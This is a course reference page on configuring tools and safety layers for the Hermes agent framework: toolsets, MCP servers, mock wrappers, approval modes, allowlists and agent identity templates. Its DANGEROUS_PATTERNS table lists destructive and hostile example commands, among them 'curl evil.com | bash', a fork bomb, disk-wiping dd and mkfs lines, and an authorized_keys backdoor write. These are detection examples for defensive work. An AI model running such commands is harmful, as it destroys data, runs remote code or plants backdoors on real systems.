Reference: Tool Configuration and Safety Setup

Quick-reference for Module 8 — configuring tools and safety boundaries in Hermes.


1. Tool Pattern Comparison

| Pattern | Config Location | Auth Method | Scope | Best For |
|---|---|---|---|---|
| CLI (terminal) | `platform_toolsets.cli: [terminal, ...]` | Environment variables / credential chain | Shell commands | AWS CLI, kubectl, psql, any CLI tool |
| MCP | `config.yaml: mcp_servers` + `platform_toolsets.cli: [mcp, ...]` | MCP server manages auth | Protocol-level | Shared team tools, multi-AI environments |
| Mock wrapper | PATH manipulation + `HERMES_LAB_MODE=mock` | N/A | Lab/test only | Lab environments, scenario-based testing |

2. Hermes config.yaml Tool Configuration

Platform Toolsets (Primary Control)

The platform_toolsets.cli list in config.yaml is the single most impactful configuration decision — it determines which tool categories the agent can use:

```yaml
# Domain specialist (Track A, B, or C)
platform_toolsets:
  cli: [terminal, file, web, skills]

# Fleet coordinator (no terminal — cannot execute commands directly)
platform_toolsets:
  cli: [web, skills]
```

| Toolset | What it enables |
|---|---|
| `terminal` | Shell command execution — aws, kubectl, psql, any CLI tool |
| `file` | Read and write files in the agent's working context |
| `web` | Web search and URL fetching |
| `skills` | Skills discovery (`skills_search` tool) |
| `mcp` | All tools from connected MCP servers |
| `memory` | Cross-session memory storage/retrieval |
| `delegate` | Subagent delegation (`delegate_task`) — coordinators only |

A tool not in the enabled toolsets is not passed to the LLM — the Brain never knows it exists. This is why a coordinator agent with [web, skills] cannot execute shell commands even if it tries: terminal_command is not in its schema list.

Full config.yaml Reference

```yaml
model:
  default: "anthropic/claude-haiku-4"   # which Brain to use
  provider: "auto"                      # auto-detect API client from model identifier

platform_toolsets:
  cli: [terminal, file, web, skills]    # which tools are available

approvals:
  mode: manual    # L2: manual approval for DANGEROUS_PATTERNS matches
  timeout: 300    # 5 minutes — required for interactive sessions

command_allowlist: []   # pre-approved patterns (empty = nothing permanent; L4 would add entries)

agent:
  max_turns: 30    # loop termination limit
  verbose: false   # suppress intermediate tool output
```
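Once parsed, this config drives a small number of decisions. The sketch below (not Hermes source — field names mirror the reference above, and the helper names are illustrative) shows how the parsed dict might be consumed, as `yaml.safe_load` would produce it:

```python
# Parsed form of the config.yaml reference above (field names match the doc).
config = {
    "model": {"default": "anthropic/claude-haiku-4", "provider": "auto"},
    "platform_toolsets": {"cli": ["terminal", "file", "web", "skills"]},
    "approvals": {"mode": "manual", "timeout": 300},
    "command_allowlist": [],
    "agent": {"max_turns": 30, "verbose": False},
}

def enabled_toolsets(cfg: dict) -> set:
    """Toolsets the agent may expose to the LLM; an empty list disables everything."""
    return set(cfg.get("platform_toolsets", {}).get("cli", []))

def is_coordinator(cfg: dict) -> bool:
    """Coordinators are identified by the absence of the terminal toolset."""
    return "terminal" not in enabled_toolsets(cfg)
```

A domain specialist config returns `False` from `is_coordinator`; the fleet coordinator config (`cli: [web, skills]`) returns `True`.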

MCP Server Configuration

```yaml
mcp_servers:
  kubernetes:
    transport: stdio
    command: "mcp-server-kubernetes"
    args: ["--kubeconfig", "${KUBECONFIG}"]
  filesystem:
    transport: stdio
    command: "mcp-server-filesystem"
    args: ["--root", "/workspace/logs"]
    # Constrains file access to /workspace/logs only
```

Stdio transport: MCP server runs as a subprocess of the agent process. Same security context. Simpler to set up. Limited to local use.

HTTP SSE transport: MCP server runs as a separate service. Can be remote. Requires authentication. Suitable for shared infrastructure.
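Because a stdio server is just a subprocess reading JSON-RPC from stdin, it can be driven by hand. The sketch below assumes a line-delimited JSON-RPC framing and an arbitrary stdio MCP server command; it is illustrative, not a client implementation:

```python
import json
import subprocess

def tools_list_request(request_id: int = 1) -> str:
    """Serialize a JSON-RPC 2.0 tools/list request (one message per line)."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/list",
        "params": {},
    })

def query_stdio_server(command: list) -> dict:
    """Spawn the server as a subprocess (same security context as the caller),
    write one request on stdin, and parse the first response line."""
    proc = subprocess.run(
        command,
        input=tools_list_request() + "\n",
        capture_output=True, text=True, timeout=30,
    )
    return json.loads(proc.stdout.splitlines()[0])
```

`query_stdio_server(["mcp-server-kubernetes"])` mirrors the manual `echo ... | mcp-server-kubernetes` test shown in section 9.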


3. How tools/registry.py Manages Tool Discovery

The ToolRegistry class in tools/registry.py is a singleton (registry = ToolRegistry() at module level). Each tool file calls registry.register() at import time:

```python
registry.register(
    name="terminal_command",
    toolset="terminal",
    schema={
        "name": "terminal_command",
        "description": "Execute a shell command...",
        "parameters": {
            "type": "object",
            "properties": {
                "command": {"type": "string", "description": "The shell command to execute"}
            },
            "required": ["command"]
        }
    },
    handler=execute_terminal_command,
    check_fn=lambda: shutil.which("bash") is not None,
    requires_env=[],
    is_async=False,
)
```

At session startup, model_tools.py imports all tool modules (triggering their register() calls), then calls registry.get_definitions(enabled_tool_names) to retrieve JSON Schemas for the tools whose toolsets match platform_toolsets.cli. These schemas become the tools parameter in every LLM API call.

The check_fn is called before including a tool in the schema list. Tools whose check_fn() returns False are excluded — their name never appears in the LLM's context. This is how environment-dependent tools (requiring specific env vars, binaries, or connectivity) are safely excluded from agents that do not have those prerequisites.

The key insight: the registry separates registration (which tools exist) from availability (which tools are enabled for this agent). The same codebase serves all agents — only platform_toolsets.cli in config.yaml changes which tools are visible.
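The registration/availability split can be sketched in a few lines. This is an illustrative model, not the Hermes source — the field names mirror the `registry.register()` call shown earlier, and the filtering here takes toolset names rather than tool names:

```python
class ToolRegistry:
    def __init__(self):
        self._tools = {}  # name -> registration record

    def register(self, name, toolset, schema, handler,
                 check_fn=lambda: True, requires_env=(), is_async=False):
        self._tools[name] = {
            "toolset": toolset, "schema": schema, "handler": handler,
            "check_fn": check_fn, "requires_env": requires_env,
            "is_async": is_async,
        }

    def get_definitions(self, enabled_toolsets):
        """Schemas for tools whose toolset is enabled AND whose check_fn passes.
        Everything else never reaches the LLM's context."""
        return [
            rec["schema"] for rec in self._tools.values()
            if rec["toolset"] in enabled_toolsets and rec["check_fn"]()
        ]

registry = ToolRegistry()  # module-level singleton, as in tools/registry.py
registry.register("terminal_command", "terminal",
                  {"name": "terminal_command"}, handler=print)
registry.register("web_search", "web",
                  {"name": "web_search"}, handler=print)

# A coordinator with [web, skills] never sees terminal_command:
coordinator_schemas = registry.get_definitions({"web", "skills"})
```

With this model, the coordinator's schema list contains only `web_search`; the same registry serves a specialist by passing a different toolset set.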


4. Mock Wrapper Setup Reference

Environment Variable Routing

```bash
# Enable mock mode
export HERMES_LAB_MODE=mock
export HERMES_LAB_SCENARIO=messy   # or: clean

# Add wrappers to front of PATH
export PATH="$(pwd)/course/infrastructure/wrappers:$PATH"
```

With these variables set, any call to aws, psql, or kubectl from within the agent resolves to the mock wrapper in course/infrastructure/wrappers/ instead of the real binary.
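The PATH trick itself is easy to verify in isolation. The self-contained demonstration below creates a fake executable (`fakecmd` is a made-up name) in a temporary directory, prepends that directory to PATH, and shows that lookup resolves to it first — exactly the shadowing mechanism the wrappers rely on:

```python
import os
import shutil
import stat
import tempfile

# Create a directory holding a fake executable.
wrapper_dir = tempfile.mkdtemp()
wrapper = os.path.join(wrapper_dir, "fakecmd")
with open(wrapper, "w") as f:
    f.write("#!/bin/sh\necho MOCK\n")
os.chmod(wrapper, os.stat(wrapper).st_mode | stat.S_IXUSR)

# Prepend it to PATH — the same move as the export PATH=... line above.
os.environ["PATH"] = wrapper_dir + os.pathsep + os.environ["PATH"]

# Lookup now resolves to the wrapper, not any real binary of the same name.
resolved = shutil.which("fakecmd")
```

Removing `wrapper_dir` from PATH (or starting a fresh shell) restores normal resolution, which is why the mock setup is per-session.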

Mock Banner

Mock wrappers print a visible banner to stderr:

```
╔══════════════════════════════════════════╗
║              [ MOCK MODE ]               ║
║    Data source: pre-baked JSON files     ║
║  Set HERMES_LAB_MODE=live for real AWS   ║
╚══════════════════════════════════════════╝
```

This banner serves two purposes: participants can visually confirm they are in mock mode, and agents have something observable to report — each SOUL.md includes a rule to "confirm HERMES_LAB_MODE before every session."

HERMES_LAB_MODE is a per-session environment variable (set in the terminal session before launching Hermes) rather than a persistent configuration key. This is intentional: making it persistent (e.g., in ~/.hermes/.env) risks accidentally keeping mock mode active in production use.

Routing Logic Example (mock-aws)

```bash
LAB_MODE="${HERMES_LAB_MODE:-live}"
if [[ "$LAB_MODE" != "mock" ]]; then
  exec "$(command -v aws)" "$@"   # route to real aws
fi

# MOCK MODE path:
SCENARIO="${HERMES_LAB_SCENARIO:-clean}"
case "$1 $2" in
  "rds describe-db-instances")
    if [[ "$SCENARIO" == "messy" ]]; then
      cat "$MOCK_DATA_DIR/rds/describe-db-instances-slow.json"
    else
      cat "$MOCK_DATA_DIR/rds/describe-db-instances.json"
    fi
    ;;
  "ce get-cost-and-usage")
    cat "$MOCK_DATA_DIR/cost-explorer/normal-spend.json"
    ;;
esac
```

If the agent runs a command outside the mock's coverage, it gets MOCK ERROR: No mock defined for... — a clear signal that the mock needs to be extended.
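The routing above reduces to a fixture lookup keyed on scenario and command prefix. Re-expressed in Python (the real wrappers are bash; fixture paths here are illustrative), the coverage-miss behavior is an explicit failure rather than a silent pass-through:

```python
# (scenario, "service operation") -> fixture path, mirroring the case branches above.
FIXTURES = {
    ("clean", "rds describe-db-instances"): "rds/describe-db-instances.json",
    ("messy", "rds describe-db-instances"): "rds/describe-db-instances-slow.json",
    ("clean", "ce get-cost-and-usage"): "cost-explorer/normal-spend.json",
}

def route(scenario: str, service: str, operation: str) -> str:
    """Return the fixture path to serve, or fail loudly on a coverage miss."""
    key = (scenario, f"{service} {operation}")
    if key not in FIXTURES:
        # Mirrors the wrapper's MOCK ERROR signal — extend the mock, don't guess.
        raise LookupError(f"MOCK ERROR: No mock defined for {service} {operation}")
    return FIXTURES[key]
```

Failing loudly is the point: a silent fallback to the real binary would defeat the lab isolation.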


5. DANGEROUS_PATTERNS Reference

tools/approval.py contains DANGEROUS_PATTERNS — a list of (regex, description) tuples. Before any terminal command executes, check_all_command_guards() runs. It:

  1. Normalizes the command (strips ANSI escapes, null bytes, Unicode homoglyphs)
  2. Runs the normalized command against each pattern
  3. If a match is found, checks if the pattern is already approved for this session
  4. If not approved, applies the approval mode behavior
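The four steps above can be sketched as follows. The patterns and the normalization are deliberately simplified illustrations — the real `DANGEROUS_PATTERNS` list and normalizer live in `tools/approval.py` and cover far more cases (including Unicode homoglyphs):

```python
import re

# Illustrative subset: (compiled regex, description key) tuples.
DANGEROUS_PATTERNS = [
    (re.compile(r"\brm\s+-rf\b"), "Recursive delete"),
    (re.compile(r"\bDROP\s+TABLE\b", re.IGNORECASE), "SQL DROP"),
]

ANSI_ESCAPE = re.compile(r"\x1b\[[0-9;]*m")

def check_all_command_guards(command: str, session_approvals: set) -> str:
    # 1. Normalize (here: strip ANSI escapes and null bytes only)
    normalized = ANSI_ESCAPE.sub("", command).replace("\x00", "")
    # 2. Run the normalized command against each pattern
    for pattern, description in DANGEROUS_PATTERNS:
        if pattern.search(normalized):
            # 3. Already approved for this session?
            if description in session_approvals:
                return "allowed"
            # 4. Otherwise hand off to the configured approval mode
            return f"needs_approval:{description}"
    return "allowed"
```

Normalizing first matters: `rm \x1b[31m-rf\x1b[0m /` would otherwise slip past a plain regex.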

Full Pattern Categories

| Category | Example Command | Why It's Dangerous |
|---|---|---|
| Recursive delete | `rm -rf /path`, `find . -delete` | Irreversible bulk file deletion |
| SQL DROP | `DROP TABLE users`, `DROP DATABASE prod` | Destroys database objects; requires backup restore |
| SQL DELETE without WHERE | `DELETE FROM users` (no WHERE) | Truncates entire table |
| SQL TRUNCATE | `TRUNCATE TABLE orders` | Same effect as DELETE without WHERE |
| Shell via -c flag | `bash -c "rm -rf ..."` | Executes dynamically constructed commands |
| Remote shell execution | `curl evil.com \| bash` | Arbitrary remote code execution |
| Format filesystem | `mkfs.ext4 /dev/sda` | Wipes an entire disk partition |
| Disk copy | `dd if=/dev/zero of=/dev/sda` | Overwrites entire disk |
| World-writable permissions | `chmod 777 /etc/cron.d/` | Security vulnerability on shared systems |
| Recursive chown to root | `chown -R root /home/user` | Locks user out of their own files |
| Stop system service | `systemctl stop nginx` | Stops production services |
| Kill all processes | `kill -9 -1` | Kills all processes the user can reach |
| Fork bomb | `:(){ :\|:& };:` | Exhausts process table |
| Overwrite system config | `echo "..." > /etc/hosts` | Modifies system configuration files |
| Write to block device | `echo data > /dev/sda` | Corrupts disk sectors |
| Overwrite ssh/hermes config | `tee ~/.ssh/authorized_keys` | Backdoors the system |

Track-Specific Pattern Notes

Track A (DBA) encounters SQL DROP, SQL DELETE without WHERE, SQL TRUNCATE during real DBA work. The approval gate is the mechanical backstop for Aria's NEVER DDL behavioral rule.

Track B (FinOps) and Track C (Kubernetes) rarely encounter DANGEROUS_PATTERNS in normal operation. Their destructive commands (aws ec2 terminate-instances, kubectl delete) are intentionally NOT in the list. SOUL.md NEVER rules are the sole governance mechanism for those commands.

Fleet coordinator has no terminal, so DANGEROUS_PATTERNS never fires for Morgan at all. Morgan's governance is purely behavioral.


6. Approval Mode Configuration

L2: manual

```yaml
approvals:
  mode: manual
  timeout: 300   # 5 minutes; timeout treated as denial
```

When a dangerous command is detected:

  1. The terminal tool pauses execution
  2. The command and description are presented to the human
  3. The human chooses: [o]nce | [s]ession | [a]lways | [d]eny

The always choice writes the pattern description key to command_allowlist in config.yaml and persists across sessions.
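The four outcomes can be sketched as a small decision function. This is illustrative, not Hermes source — in particular, appending to `allowlist` stands in for the real write-back to `command_allowlist` in config.yaml:

```python
def apply_choice(choice: str, description: str,
                 session_approvals: set, allowlist: list) -> bool:
    """Return True if the command may run now."""
    if choice == "o":              # once: run now, ask again next time
        return True
    if choice == "s":              # session: remember until the process exits
        session_approvals.add(description)
        return True
    if choice == "a":              # always: persist the description key
        session_approvals.add(description)
        allowlist.append(description)   # stand-in for writing config.yaml
        return True
    return False                   # "d" or timeout: treated as denial
```

Note the asymmetry: `once` leaves no state behind, `session` mutates only in-memory state, and `always` is the only choice that survives a restart.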

L3: smart

```yaml
approvals:
  mode: smart
  timeout: 300
```

The same pattern detection runs, but before presenting to the human, an auxiliary LLM assesses the command:

```python
prompt = """You are a security reviewer for an AI coding agent.
Command: {command}
Flagged reason: {description}

APPROVE if the command is clearly safe
DENY if genuinely dangerous
ESCALATE if uncertain

Respond with exactly one word: APPROVE, DENY, or ESCALATE"""
```

Smart approval eliminates approval fatigue caused by false positives while preserving human oversight for genuinely risky commands. When the auxiliary LLM is unavailable (no credentials, API error), smart mode falls back to manual.
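The control flow — three verdicts plus a fallback — can be sketched as below. `ask_llm` and `manual_review` are stand-ins for the auxiliary model call and the L2 human prompt; any exception from the model call (missing credentials, API error) downgrades to manual review:

```python
def smart_review(command: str, description: str, ask_llm, manual_review):
    """Return the approval decision for a flagged command under smart mode."""
    try:
        verdict = ask_llm(command, description).strip().upper()
    except Exception:
        # Auxiliary LLM unavailable: fall back to manual mode.
        return manual_review(command, description)
    if verdict == "APPROVE":
        return True
    if verdict == "DENY":
        return False
    # ESCALATE — or any malformed response — goes to the human.
    return manual_review(command, description)
```

Treating a malformed verdict the same as ESCALATE is the conservative choice: the human gate only ever sees more, never less.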

L4: command_allowlist

```yaml
approvals:
  mode: smart
  timeout: 300

command_allowlist:
  - "SQL SELECT"   # description-key strings from DANGEROUS_PATTERNS
  - "EXPLAIN"
```

Patterns whose description key appears in command_allowlist bypass the approval gate entirely. At the course level, all agents start with an empty allowlist. Adding entries to the allowlist is a security decision requiring documented rationale.

L1: no terminal

```yaml
platform_toolsets:
  cli: [web, skills]   # terminal absent — no commands, no approval gate
```

At L1, the approval gate never fires because the terminal tool is not available.


7. Safety Configuration Profiles

Read-Only Domain Specialist (L2 — Course Default)

```yaml
platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: manual
  timeout: 300

command_allowlist: []
```

Agent can run diagnostics. Any DANGEROUS_PATTERNS match pauses for human decision. Nothing permanently pre-approved.

Fleet Coordinator (Governance by Design)

```yaml
platform_toolsets:
  cli: [web, skills]   # No terminal — coordinator pattern enforced mechanically

approvals:
  mode: manual         # Still set; defense against misconfiguration
  timeout: 300

delegation:
  max_iterations: 30
  default_toolsets: ["terminal", "file", "web", "skills"]   # Grants to spawned specialists
```

The coordinator has no terminal. Even if its SOUL.md NEVER rules were removed, it still could not execute commands because the terminal tool is not registered in its schema.

Semi-Autonomous Production Agent (L4)

```yaml
platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: smart
  timeout: 300

command_allowlist:
  - "SQL SELECT"        # Read-only SQL is pre-approved
  - "explain analyze"   # EXPLAIN ANALYZE is pre-approved
  # Populated only after documented L3 track record review
```

8. SOUL.md Templates

Track A: DBA Specialist (Aria)

```markdown
# Aria — RDS PostgreSQL Health Specialist

**Role:** Database reliability agent for RDS PostgreSQL performance diagnosis
**Domain:** Track A: Database
**Scope:** PostgreSQL performance diagnostics on AWS RDS. Diagnosis and recommendation ONLY. Parameter changes route through DBA approval workflow.

## Identity

You are Aria, a database reliability agent for DevOps teams running PostgreSQL on AWS RDS. You diagnose performance problems — slow queries, index gaps, parameter drift — and recommend precise fixes. You do not execute changes; you surface findings and propose remediation steps for human approval. Every diagnosis ties an observation to a specific metric or query pattern.

## Behavior Rules

- Run EXPLAIN before recommending any index — never guess at query plans
- Report numeric thresholds: CPUUtilization > 80%, query mean_time > 1000ms, calls > 500/hour
- Present all findings in Observation → Evidence → Recommendation format
- Confirm HERMES_LAB_MODE before every session: state MOCK or LIVE clearly in your first line
- NEVER execute ALTER TABLE, CREATE INDEX, or any DDL without explicit human approval
- NEVER run VACUUM FULL during business hours — acquires exclusive lock, blocks all reads and writes
- NEVER modify max_connections without scheduling a restart — static parameter, change not effective until restart

## Escalation Policy

Escalate to human when:
- CPUUtilization sustained > 90% for 5+ minutes
- pg_stat_statements shows a query with mean_time > 5000ms
- Parameter change requires database restart
- Root cause spans more than one service (possible cross-domain incident)

Always say: "Escalating — this exceeds DBA agent scope. Human review required before proceeding."
```

Fleet Coordinator (Morgan)

```markdown
# Morgan — Fleet Coordination Agent

**Role:** Cross-domain incident coordination — route to specialists, synthesize findings
**Domain:** Fleet Coordinator
**Scope:** Incident triage and specialist delegation. NEVER executes domain commands directly.

## Identity

You are Morgan, a fleet coordination agent for cross-domain DevOps incidents. When an incident involves multiple domains (database, cost, Kubernetes), you decompose it into domain-specific tasks and delegate each to the appropriate specialist. You synthesize their findings into a single incident summary. You never run database queries, AWS CLI commands, or kubectl directly — specialists do that work.

## Behavior Rules

- Decompose multi-domain incidents into discrete domain tasks before delegating
- Synthesize specialist findings into a single cross-domain incident view
- NEVER run database queries (SELECT, EXPLAIN, psql) — delegate to track-a
- NEVER run AWS CLI commands — delegate to track-b
- NEVER run kubectl commands — delegate to track-c
- NEVER spawn more than one delegation per domain per incident

## Escalation Policy

Escalate to human when:
- Two or more specialists return CRITICAL diagnosis simultaneously
- Any specialist reports data unavailable (infrastructure access failure)
- Cross-domain root cause requires architectural decision
```

9. MCP Server Setup Reference

Installing a Local MCP Server

```bash
# Kubernetes MCP server
npm install -g @modelcontextprotocol/server-kubernetes

# Filesystem MCP server
npm install -g @modelcontextprotocol/server-filesystem

# Verify server is runnable
mcp-server-kubernetes --help
```

Testing an MCP Server Manually

```bash
# Stdio transport: send a JSON-RPC list request via stdin
echo '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' | mcp-server-kubernetes
# Expected: JSON response listing available tools with their schemas
```

Debugging MCP Connections in Hermes

```bash
hermes -p track-a --mcp-debug
# Outputs MCP protocol messages to stderr for debugging tool discovery and calls
```

10. Safety Checklist Before Deployment

Before connecting your agent to a real environment:

  • platform_toolsets.cli matches the agent type — domain specialists have terminal; coordinators do not
  • approvals.mode is manual for first deployment — never off for production
  • approvals.timeout is set (300 recommended for interactive sessions)
  • command_allowlist is reviewed — no silent pre-approvals without documented rationale
  • SOUL.md NEVER rules cover the most dangerous domain-specific actions (not just generic AI safety rules)
  • For Track B/C: SOUL.md NEVER rules for aws ec2 terminate-instances and kubectl delete are present and specific — these are not in DANGEROUS_PATTERNS
  • Agent has been tested in mock mode before running against live infrastructure
  • You can name the highest-blast-radius command the agent could run and confirm what governs it (SOUL.md rule, DANGEROUS_PATTERNS, or mechanical toolset restriction)

11. wrapper_allowlist — Course Governance Enforcement

You will see a wrapper_allowlist: key in the course/agents/track-*/config.yaml files and in the governance/governance-L*.yaml reference files. This is not a native Hermes feature. It is a course-local enforcement layer added on top of Hermes to solve a specific problem: Hermes's native command_allowlist only bypasses the approval gate for commands that are already in DANGEROUS_PATTERNS — and kubectl delete, kubectl drain, kubectl cordon, aws ec2 terminate-instances, etc. are NOT in that list.

What problem does it solve?

Track B (FinOps) and Track C (Kubernetes) have destructive commands that Hermes's mechanical approval gate will never fire on. Without the wrapper layer, the only thing stopping a Track C agent from running kubectl delete pod --all is a behavioral NEVER rule in its SOUL.md. Behavioral rules are load-bearing but not mechanical — an LLM can misread or misprioritize them under pressure. The course introduces a second mechanical layer.

How is it implemented?

The infrastructure/wrappers/ directory contains three executable bash scripts:

```
infrastructure/wrappers/
├── mock-kubectl   ← intercepts `kubectl` when this directory is first in PATH
├── mock-aws       ← intercepts `aws`
└── mock-psql      ← intercepts `psql`
```

When you export PATH="$(pwd)/infrastructure/wrappers:$PATH" at the start of a lab session, any call to kubectl/aws/psql from the Hermes agent (or your own terminal) resolves to the wrapper script FIRST, not the real binary.

The wrapper runs two checks before forwarding the command:

  1. Mode routing. Reads HERMES_LAB_MODE:

    • mock (default in labs) → serve pre-baked JSON from infrastructure/mock-data/ and never touch the real binary
    • live → pass through to the real kubectl/aws/psql via exec "$(command -v kubectl)" "$@"
  2. Governance pre-flight (added in Phase 7). Reads HERMES_LAB_GOVERNANCE and HERMES_LAB_TRACK, then:

    • Resolves the active governance yaml file (e.g., governance/governance-L2.yaml or governance/governance-L4-track-c.yaml)
    • Parses its wrapper_allowlist.<tool>: subsection using a bash+awk YAML reader (no external dependencies)
    • Checks the incoming command prefix against the allowlist entries
    • Allowed: continues to mode routing step 1
    • Not allowed: prints a loud ╓ GOVERNANCE REJECTED ╖ banner to stderr and exits with code 1 — the real binary is never invoked

Here is a minimal example wrapper_allowlist:

```yaml
# In agents/track-c-kubernetes/config.yaml
model:
  default: "anthropic/claude-haiku-4-5"
  provider: "Anthropic"

platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: manual
  timeout: 300

# Hermes-native bypass (empty — course does not use this mechanism)
command_allowlist: []

# ── Course wrapper enforcement (Phase 7 — NOT a native Hermes feature) ──
# Read by infrastructure/wrappers/mock-kubectl when HERMES_LAB_GOVERNANCE is set.
# The wrapper matches the "${1} ${2}" prefix of the incoming command against these entries.
# Track C uses only the kubectl subsection. Track A uses psql. Track B uses aws.
wrapper_allowlist:
  kubectl:
    - "get pods"
    - "get pod "
    - "get nodes"
    - "get endpoints"
    - "describe pod "
    - "describe node "
    - "logs "
    - "top pods"
    - "top nodes"
```

A Track C agent running under this config can freely execute kubectl get pods and kubectl describe pod my-app, but kubectl delete pod my-app exits immediately with the rejection banner — regardless of what the agent's SOUL.md NEVER rules say or don't say. The mechanical layer is independent of the behavioral layer.
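The wrapper's check reduces to a prefix match. Re-expressed in Python for clarity (the real implementation is bash+awk; the allowlist below is copied from the config example above):

```python
# Allowlist entries, as parsed from wrapper_allowlist.kubectl in the config above.
KUBECTL_ALLOWLIST = [
    "get pods", "get pod ", "get nodes", "get endpoints",
    "describe pod ", "describe node ", "logs ", "top pods", "top nodes",
]

def governance_check(args: list, allowlist=KUBECTL_ALLOWLIST) -> bool:
    """True if the command's leading words match an allowlist prefix;
    False means the wrapper prints GOVERNANCE REJECTED and exits 1."""
    command = " ".join(args)
    return any(command.startswith(entry) for entry in allowlist)
```

Note why `"get pod "` and `"describe pod "` keep their trailing space: it forces a pod name to follow, so `get pods` and `get pod my-app` both pass while an unlisted subcommand like `get podsecuritypolicies` would not sneak in via a bare `"get pod"` prefix.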

Three-layer defense model

The wrapper_allowlist is one of three independent safety layers. They fire in order for every command:

| Layer | Mechanism | Fires when | Owns |
|---|---|---|---|
| 1. wrapper_allowlist | Course bash wrapper intercepts kubectl/aws/psql | Every command via the wrapper, always | All kubectl/aws/psql commands — including the ones Hermes doesn't know are dangerous |
| 2. DANGEROUS_PATTERNS (Hermes native) | tools/approval.py regex match on the command string | Only when the command matches a built-in pattern (SQL DROP, rm -rf, etc.) | Generic dangerous patterns across shells |
| 3. SOUL.md NEVER rules | Agent refuses behaviorally based on identity prompts | LLM decision at reasoning time | Domain-specific prohibitions the agent enforces in reasoning |

Track A (database) is the only track where all three layers fire on DROP TABLE users. Track B/C destructive commands only get Layers 1 and 3 because they are absent from DANGEROUS_PATTERNS — which is exactly why the course adds Layer 1 via the wrapper.

Where do the wrappers come from?

  • Phase 1 shipped the initial mock-kubectl, mock-aws, mock-psql — basic mode routing (mock vs live) with pre-baked JSON fixtures.
  • Phase 6 extended mock-kubectl with 6 new broken-pod scenarios (ImagePullBackOff, CrashLoopBackOff, OOMKilled, liveness probe, missing secret, port mismatch) for K8s diagnostic skills labs.
  • Phase 7 added the wrapper_allowlist pre-flight check to all three wrappers, along with the HERMES_LAB_GOVERNANCE and HERMES_LAB_TRACK env vars and the GOVERNANCE REJECTED banner.

The wrapper code lives in the course repo at infrastructure/wrappers/ — not in Hermes itself. You can cat them to read the exact bash implementation. When you distribute your completed agent profile outside the course, the wrappers don't come with it; consumers of your profile who want the same governance enforcement would need to copy them separately or adopt the same PATH trick.

Env vars the wrappers read

| Env Var | Values | Purpose |
|---|---|---|
| `HERMES_LAB_MODE` | `mock` \| `live` | Mode routing (serve fixtures or pass through to real binary) |
| `HERMES_LAB_SCENARIO` | `clean`, `messy`, `crashloop2`, `oom`, `image-pull`, `liveness`, `missing-secret`, `port-mismatch` | Which mock fixture set to serve in mock mode |
| `HERMES_LAB_GOVERNANCE` | `L1` \| `L2` \| `L3` \| `L4` | Which governance yaml's wrapper_allowlist is active |
| `HERMES_LAB_TRACK` | `track-a` \| `track-b` \| `track-c` | Required at L4 to disambiguate the 3 track-specific L4 files |
| `MOCK_DATA_DIR` | path | Location of pre-baked JSON fixtures |

Every course lab that uses the wrapper layer shows the complete export block for these variables at the top of every major step. If your agent's commands are being unexpectedly allowed or rejected, the first thing to check is whether all the env vars are set in the shell that launched Hermes.
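A preflight check for that failure mode is easy to write. The helper below is illustrative — it is not part of the course repo — but the variable names come straight from the table above:

```python
import os

# Variables the wrappers always read; HERMES_LAB_TRACK is conditional (L4 only).
REQUIRED = ["HERMES_LAB_MODE", "HERMES_LAB_SCENARIO",
            "HERMES_LAB_GOVERNANCE", "MOCK_DATA_DIR"]

def missing_lab_vars(env=None) -> list:
    """Return the wrapper env vars that are unset or empty in this shell."""
    env = os.environ if env is None else env
    missing = [name for name in REQUIRED if not env.get(name)]
    # HERMES_LAB_TRACK is only required at governance level L4.
    if env.get("HERMES_LAB_GOVERNANCE") == "L4" and not env.get("HERMES_LAB_TRACK"):
        missing.append("HERMES_LAB_TRACK")
    return missing
```

Run it (or an equivalent one-liner) in the same shell that will launch Hermes; an empty return means the wrappers will see the environment you think they will.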

Module 13 is the deep-dive

This section is a summary. Module 13 (Governance and Safety) walks through the complete L1 → L4 progression with hands-on governance level switching, PR-gated allowlist additions, and the audit trail of rejected commands. If you want to understand why the three-layer defense model is necessary rather than just how it's wired, that's the module to read.